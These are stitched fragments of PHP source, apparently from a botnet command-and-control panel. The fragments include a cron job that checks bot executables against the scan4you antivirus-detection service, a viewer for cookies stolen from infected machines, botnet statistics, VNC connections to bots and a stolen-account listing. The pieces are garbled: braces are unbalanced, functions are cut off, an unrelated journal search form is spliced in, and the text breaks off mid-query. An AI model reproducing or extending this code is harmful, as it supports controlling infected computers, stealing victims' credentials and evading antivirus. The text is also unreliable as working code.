/** Scan exe files under files/ using scan4you
* @param int|null $id
* File id for force scan
* @param bool $html
* Return HTML along with raw data
* @cron if: return !empty($GLOBALS['config']['scan4you_id']) && !empty($GLOBALS['config']['scan4you_token']);
* @cron period: 1d
* @cron weight: 10
*/
function cronjob_avirscan_files($id = null)
{
$jabber_notify = array();
$scan4you = new Scan4you($GLOBALS['config']['scan4you_id'], $GLOBALS['config']['scan4you_token']);
if (!is_null($id)) {
mysql_q(mkquery('UPDATE `exe_updates` SET `scan_date`=0 WHERE `id`={i:id};', array('id' => $id)));
}
$job_result = array();
$res = mysql_q(mkquery('SELECT `id`, `file`, `mtime` FROM `exe_updates` WHERE `scan_date` < {i:date};', array('date' => time() - 60 * 60 * 20)));
while ($res && !is_bool($exe = mysql_fetch_assoc($res))) {
$exe_path = 'files/' . $exe['file'];
# scan
$results = $scan4you->scan($exe_path);
$job_result[$exe['file']] = array('threat' => count($results->scan_threat), 'okay' => count($results->scan_okay));
if (!is_null($results->error)) {
$job_result[$exe['file']]['error'] = $results->error;
}
# store
mysql_q(mkquery("UPDATE `exe_updates` SET `scan_date`=UNIX_TIMESTAMP(), `scan_threat` = {i:threat}, `scan_count`={i:count}, `scan_details`={s:details} WHERE `id`={i:id}", array('threat' => count($results->scan_threat), 'count' => count($results->scan_threat) + count($results->scan_okay), 'details' => $results->render_html('class="avirscan-results-map"'), 'id' => $exe['id'])));
# notify
if (count($results->scan_threat) >= 6) {
$jabber_notify[] = sprintf("%s: %d Antiviruses detect it!\n\n%s\n", $exe['file'], count($results->scan_threat), $results->render_text());
}
}
# Jabber notify
jabber_notify($GLOBALS['config']['scan4you_jid'], $jabber_notify);
# Results
return $job_result;
}
/** Remove old scripts which are one-shot
* @cron period: 1d
*/
function cronjob_cleanse_old()
{
mysql_q(mkquery('DELETE `botnet_scripts`, `botnet_scripts_stat`
FROM `botnet_scripts` CROSS JOIN `botnet_scripts_stat` USING(`extern_id`)
WHERE `botnet_scripts`.`flag_enabled`=0 AND `botnet_scripts`.`send_limit`=1 AND `botnet_scripts`.`time_created`<{i:time_thr}
', array('time_thr' => time() - 60 * 60 * 24 * 7)));
return array('removed' => mysql_affected_rows());
}
}
}
header('Location: ' . QUERY_STRING_BLANK . 'reports_files&bots=' . urlencode(implode(' ', $blist)) . '&q=');
die;
} else {
if (strcmp($ba, 'cookies') === 0) {
require_once 'system/lib/db.php';
require_once 'system/lib/guiutil.php';
echo '<link rel="stylesheet" href="theme/style.css" />';
$found_n = 0;
foreach (array_reverse(list_reports_tables(true)) as $yymmdd) {
$R = mysql_q(mkquery('SELECT
`id`,
`rtime`,
`path_source`,
`context`
FROM `botnet_reports_{=:yymmdd}`
WHERE `bot_id` IN({s,:botId}) AND `type`={i:type}
ORDER BY `rtime` DESC
', array('yymmdd' => $yymmdd, 'botId' => $blist, 'type' => BLT_COOKIES)));
$n = mysql_num_rows($R);
if (!$n) {
continue;
}
$found_n += $n;
echo '<table class="lined"><caption>', '20', implode('.', str_split($yymmdd, 2)), '</caption>';
echo '<TBODY>';
while (!is_bool($r = mysql_fetch_assoc($R))) {
echo '<tr>', '<th>', timeago(time() - $r['path_source']), '</th>', '<td>', htmlspecialchars($r['path_source']), '</td>', '<td><pre>', htmlspecialchars($r['context']), '</td>', '</tr>';
}
echo '</BODY></table>';
function getBotnetStats($botnet, $i)
{
$query1 = '';
$query2 = '';
if ($botnet != '') {
$botnet = addslashes($botnet);
$query1 = " WHERE `botnet`='{$botnet}'";
$query2 = " AND `botnet`='{$botnet}'";
}
//Количетсво ботов, и время первого отчета.
$tmp = htmlEntitiesEx(($mt = @mysql_fetch_row(mysqlQueryEx('botnet_list', "SELECT MIN(`rtime_first`), COUNT(`bot_id`), MIN(`bot_version`), MAX(`bot_version`) FROM `botnet_list`{$query1}"))) && $mt[0] > 0 ? gmdate(LNG_FORMAT_DT, $mt[0]) : '-');
$data = THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_FIRST_BOT), $i == 0 ? THEME_LIST_ITEM_LTEXT_U1 : THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $tmp), $i == 0 ? THEME_LIST_ITEM_RTEXT_U1 : THEME_LIST_ITEM_RTEXT_U2) . THEME_LIST_ROW_END . THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_BOTS), $i == 0 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, numberFormatAsInt($mt[1])), $i == 0 ? THEME_LIST_ITEM_RTEXT_U2 : THEME_LIST_ITEM_RTEXT_U1) . THEME_LIST_ROW_END;
$totalBots = $mt[1];
$minVersion = $mt[2];
$maxVersion = $mt[3];
//Количетсво ботов активных за последнии 24 часа.
$tmp = ($mt = @mysql_fetch_row(mysqlQueryEx('botnet_list', 'SELECT COUNT(`bot_id`) FROM `botnet_list` WHERE `rtime_last`>=' . (CURRENT_TIME - 86400) . $query2))) ? $mt[0] : 0;
$totalBots = '<a href="#" id="tr-botnet_activity">' . ($totalBots > 0 ? numberFormatAsFloat($tmp * 100 / $totalBots, 2) : 0) . '% - ' . numberFormatAsInt($tmp) . '</a>';
$data .= THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_BOTS24), $i == 0 ? THEME_LIST_ITEM_LTEXT_U1 : THEME_LIST_ITEM_LTEXT_U2) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $totalBots), $i == 0 ? THEME_LIST_ITEM_RTEXT_U1 : THEME_LIST_ITEM_RTEXT_U2) . THEME_LIST_ROW_END;
$data .= '<tr><td id="botnet_activity" style="display: none;">
<h3>' . LNG_STATS_ACTIVITY . '</h3>
<ul class="tabs">
<li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=7">' . LNG_STATS_ACTIVITY_7DAYS . '</a></li>
<li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=14">' . LNG_STATS_ACTIVITY_14DAYS . '</a></li>
<li><a href="?' . mkuri(1, 'm') . '&ajax=botnet_activity&days=30">' . LNG_STATS_ACTIVITY_30DAYS . '</a></li>
</ul>
<div class="display">
</div>
</td></tr>
';
//Максимальная и минимальная версия бота.
$botVersions = intToVersion($minVersion) . ' — ' . intToVersion($maxVersion);
$botVersions = '<a href="#" id="botVersions">' . $botVersions . '</a>';
$data .= THEME_LIST_ROW_BEGIN . str_replace(array('{WIDTH}', '{TEXT}'), array('auto', LNG_STATS_TOTAL_VERSIONS), $i == 0 ? THEME_LIST_ITEM_LTEXT_U2 : THEME_LIST_ITEM_LTEXT_U1) . str_replace(array('{WIDTH}', '{TEXT}'), array(STAT_WIDTH, $botVersions), $i == 0 ? THEME_LIST_ITEM_RTEXT_U2 : THEME_LIST_ITEM_RTEXT_U1) . THEME_LIST_ROW_END;
require_once "system/lib/db.php";
require_once "system/lib/guiutil.php";
$data .= jsonset(array('window.botVersions' => array()));
foreach (array(0 => 0, 1 => time() - 60 * 60 * 24, 2 => time() - 60 * 60 * 24 * 7, 3 => time() - 60 * 60 * 24 * 31) as $id => $rtime_last) {
$R = mysql_q(mkquery('SELECT
`bot_version` AS `v`,
COUNT(*) AS `n`
FROM `botnet_list`
WHERE `rtime_last` >= {i:rtime_last}
GROUP BY `v`
ORDER BY `n` DESC, `v` DESC
', array('rtime_last' => $rtime_last)));
$versions = array();
while ($R && !is_bool($r = mysql_fetch_assoc($R))) {
$versions[] = array(intToVersion($r['v']), (int) $r['n']);
}
$data .= jsonset(array('window.botVersions[' . $id . ']' => $versions));
}
$ul = '';
$ul .= '<li><a href="#" data-id="0">' . LNG_STATS_TOTAL_VERSIONS_ALL . '</a>';
$ul .= '<li><a href="#" data-id="1">' . LNG_STATS_TOTAL_VERSIONS_DAY . '</a>';
$ul .= '<li><a href="#" data-id="2">' . LNG_STATS_TOTAL_VERSIONS_WEEK . '</a>';
$ul .= '<li><a href="#" data-id="3">' . LNG_STATS_TOTAL_VERSIONS_MONTH . '</a>';
$data .= <<<HTML
<tr><td id="botVersions-td" style="display:none;">
\t\t<div id="botVersions-Display" class="clearfix">
\t\t\t<div class="pie"></div>
\t\t\t<div class="table"></div>
\t\t\t</div>
\t\t<ul class="period">
\t\t\t{$ul}
\t\t\t</ul>
\t</td></tr>
<script type="text/javascript" src="https://www.google.com/jsapi"></script>
<script src="theme/js/page-stats_main.js"></script>
HTML;
return $data;
}
/** Remove old, archived Jabber notifications
* @cron period: 1d
*/
function cronjob_jabber_cleanse()
{
mysql_q(mkquery('DELETE FROM `jabber_messages` WHERE `sent`=1 AND `sent_time` < {i:old};', array('old' => time() - 60 * 60 * 24 * 10)));
return array('cleansed' => mysql_affected_rows());
}
/** Find botId by IP */
function bot_ip2id($ip)
{
$d = array('ip_bin' => pack('N', ip2long($ip)));
$R = mysql_query(mkquery('SELECT `bot_id` FROM `botnet_list` WHERE `ipv4`={s:ip_bin};', $d));
if (!$R || mysql_num_rows($R) == 0) {
return null;
}
return array_shift(mysql_fetch_row($R));
}
break;
case 'add_connect':
# ?m=botnet_vnc&ajax=add_connect&bot=ID&protocol=VNC&autoconnect=0
$d = array('bot' => $_GET['bot'], 'protocol' => array_search($_GET['protocol'], $PROTOCOLS), 'do_connect' => $_GET['autoconnect'] ? -1 : 1);
if (mysql_query(mkquery('REPLACE INTO `vnc_bot_connections` VALUES({s:bot}, {i:protocol}, {i:do_connect}, 0, 0, 0);', $d))) {
echo 'OK';
} else {
echo 'MySQL error: ' . mysql_error();
}
break;
}
die;
}
if (count($_POST)) {
if (isset($_POST['connect'])) {
mysql_query(mkquery('REPLACE INTO `vnc_bot_connections` VALUES({s:botid}, {i:protocol}, {i:do_connect}, 0, 0, 0);', $_POST['connect']));
header('HTTP/1.1 301 Redirect');
header('Location: ?m=botnet_vnc');
die;
}
}
ThemeBegin(LNG_THEME_TITLE, 0, getBotJsMenu('botmenu'), 0);
echo '<table class="table_frame" id="switch-tabs"><tr><td>', '<ul>', '<li class="current"><a href="?m=botnet_vnc"><img src="images/vnc.png" />', LNG_MM_BOTNET_VNC, '</a></li>', '<li class="other" ><a href="?m=reports_accparse"><img src="images/drill.png" />', LNG_MM_REPORTS_ACCPARSE, '</a></li>', '</ul>', '</td></tr></table>';
# ==========[ ADD BOT ]========== #
echo str_replace(array('{WIDTH}', '{COLUMNS_COUNT}', '{TEXT}'), array('100%', 1, LNG_CREATE_CONNECTION), THEME_LIST_BEGIN . THEME_LIST_TITLE), '<tr><td>';
if (empty($GLOBALS['config']['vnc_server'])) {
echo '<div class="error">', LNG_NOT_CONFIGURED, '</div>';
} else {
echo '<form method=POST>';
echo '<dl>';
echo '<dt>', LNG_CREATE_CONNECTION_BOTID, '</dt>', '<dd>', '<input type="text" name="connect[botid]" value="" size="100"/>', '</dd>';
><span>References</span></label></div>
<div><select name="sec" id="ignore">
<option selected>All sections</option>
<?php
foreach ($subj as $k => $v) {
$sel = $sec && $sec === $k ? ' selected' : '';
echo '<option value="' . $k . '"' . $sel . '>' . $v . '</option>';
}
?>
</select></div>
<div><button class="btn btn-green">Search</button></div>
</form>
</div>
<?php
}
$res = $mysqli->query(mkquery($query));
while ($row = $res->fetch_assoc()) {
$arc[$row['vol']][$row['issue']][] = $row;
$totrow++;
}
/*echo '<pre>';
print_r($arc);
echo '</pre>';*/
if (isset($arc)) {
$cursec = '';
if ($xtra) {
echo plural($totrow, 'result');
}
foreach ($arc as $vol => $issue) {
$year = J_YEAR + $vol;
$cur = current($issue);
}
echo '</TBODY>';
echo '</table>';
break;
# List accounts of a rule|bot
# List accounts of a rule|bot
case 'accs':
# The Input
$where = '1=1';
if (!empty($_GET['rule'])) {
$where .= ' AND `a`.`rule_id`={i:rule}';
}
if (!empty($_GET['bot'])) {
$where .= ' AND `a`.`bot_id`={s:bot}';
}
$where = mkquery($where, $_GET);
$_GET['online'] = isset($_GET['online']) ? (int) $_GET['online'] : 0;
# The Query
$R = mysql_query($q = <<<SQL
t\tSELECT
t\t\t`r`.`id` AS `rule_id`,
t\t\t`r`.`alias` AS `rule_alias`,
t\t\t`r`.`enabled` AS `rule_enabled`,
t\t\t`a`.`bot_id` AS `bot_id`,
t\t\t`a`.`bot_info` AS `bot_info`,
t\t\t`a`.`id` AS `acc_id`,
t\t\t`a`.`account` AS `account`,
t\t\t`a`.`mtime` AS `acc_mtime`,
t\t\t`a`.`favorite` AS `acc_favorite`,
t\t\t`a`.`notes` AS `acc_notes`,
t\t\t`b`.`os_version` AS `bot_os`,
